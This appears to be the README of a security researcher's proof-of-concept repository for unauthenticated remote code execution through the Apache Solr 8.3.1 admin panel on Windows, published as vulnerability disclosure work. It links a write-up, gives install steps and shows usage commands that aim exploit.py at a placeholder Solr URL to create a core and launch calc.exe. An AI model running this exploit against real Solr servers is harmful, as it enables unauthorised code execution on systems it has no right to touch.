scrt/Apache-Solr-8.3.1-RCE

Apache Solr 8.3.1 admin panel RCE (Windows)

Description:

This exploit allows code execution without any prior authentication on a default Solr admin panel.

Authors:

  • Nicolas Brunner - SCRT

Writeup

https://blog.scrt.ch/2023/05/01/solr-rce-from-exposed-administration-interface/

PoC:

Examples:

If no core exists, create the core from the default folder:

    ./exploit.py -u http://example.com/solr --default-core -c core_123

Using the existing core named core_123, create a new vulnerable core and execute calc.exe:

    ./exploit.py -u http://example.com/solr -f calc.xml -c core_123

Installation:

Install the required Python libraries:

    pip3 install -r requirements.txt
